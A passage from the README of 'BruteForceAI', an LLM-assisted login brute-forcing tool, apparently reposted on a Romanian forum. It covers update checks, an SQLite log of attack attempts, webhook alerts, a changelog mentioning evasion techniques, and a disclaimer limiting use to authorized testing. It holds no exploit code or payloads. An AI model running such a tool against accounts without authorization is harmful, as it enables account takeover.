BruteForceAI includes simple update checking to keep you informed about new releases. Automatic Check Checks for updates every time the tool starts Shows one-line status: either "✅ up to date" or "🔄 Update available" Quick 3-second timeout - no delays Silent network failure (no error messages) Skip with: --skip-version-check flag Manual Check (Detailed) # Check for updates manually (same as automatic but can save to file) python main.py check-updates # Check with output to file python main.py check-updates --output update_check.txt Update Information Up to date: ✅ BruteForceAI v1.0.0 is up to date Update available: 🔄 Update available: v1.0.0 → v1.1.0 | Download: https://github.com/... Performance Timeout: 3 seconds maximum No delays: Instant if network unavailable No spam: One simple line per check Version Source Updates are checked against: https://mordavid.com/md_versions.yaml 🗄️ Database Schema BruteForceAI uses SQLite database (bruteforce.db) with two main tables: form_analysis Stores LLM analysis results for each URL. brute_force_attempts Logs all attack attempts with results and metadata. Database Management # Clean all data python main.py clean-db # View database sqlite3 bruteforce.db .tables .schema 🔔 Webhook Integration Discord Setup Create webhook in Discord server settings Use webhook URL with --discord-webhook Slack Setup Create Slack app with incoming webhooks Use webhook URL with --slack-webhook Teams Setup Add "Incoming Webhook" connector to Teams channel Use webhook URL with --teams-webhook Telegram Setup Create bot with @BotFather Get bot token and chat ID Use --telegram-webhook TOKEN --telegram-chat-id CHAT_ID ⚠️ Legal Disclaimer FOR EDUCATIONAL AND AUTHORIZED TESTING ONLY This tool is designed for: ✅ Authorized penetration testing ✅ Security research and education ✅ Testing your own applications ✅ Bug bounty programs with proper scope DO NOT USE FOR: ❌ Unauthorized access to systems ❌ Illegal activities ❌ Attacking systems without permission Users are responsible for complying with all applicable laws and regulations. The author assumes no liability for misuse of this tool. 📋 Changelog v1.0.0 (Current) ✨ Initial release 🧠 LLM-powered form analysis ⚡ Multi-threaded attacks 🎭 Advanced evasion techniques 🔔 Webhook notifications 📊 Comprehensive logging 🔄 Automatic update checking 👨💻 About the Author Mor David - Offensive Security Specialist & AI Security Researcher I specialize in offensive security with a focus on integrating Artificial Intelligence and Large Language Models (LLM) into penetration testing workflows. My expertise combines traditional red team techniques with cutting-edge AI technologies to develop next-generation security tools. 🔗 Connect with Me LinkedIn: linkedin.com/in/mor-david-cyber Website: www.mordavid.com 🛡️ RootSec Community Join our cybersecurity community for the latest in offensive security, AI integration, and advanced penetration testing techniques: 🔗 t.me/root_sec RootSec is a community of security professionals, researchers, and enthusiasts sharing knowledge about: Advanced penetration testing techniques AI-powered security tools Red team methodologies Security research and development Industry insights and discussions 📄 License This project is licensed under the Non-Commercial License. Terms Summary: ✅ Permitted: Personal use, education, research, authorized testing ❌ Prohibited: Commercial use, redistribution for profit, unauthorized attacks 📋 Requirements: Attribution, same license for derivatives See the LICENSE.md file for complete terms and conditions. 🙏 Acknowledgments Playwright Team - For the excellent browser automation framework Ollama Project - For making local LLM deployment accessible Groq - For high-performance LLM inference Security Community - For continuous feedback and improvements 📊 Statistics ⭐ Star this repository if you find it useful! Made with ❤️ by Mor David | Join RootSec Community Sursa: https://github.com/MorDavid/BruteForceAI
- 
	https://www.youtube.com/watch?v=nfYlaX6b8E4 interesant de văzut
 
		 
	 
	 
	 
	 
	 
	 
	 
					
						 
	 
					
						 
	 
	 
	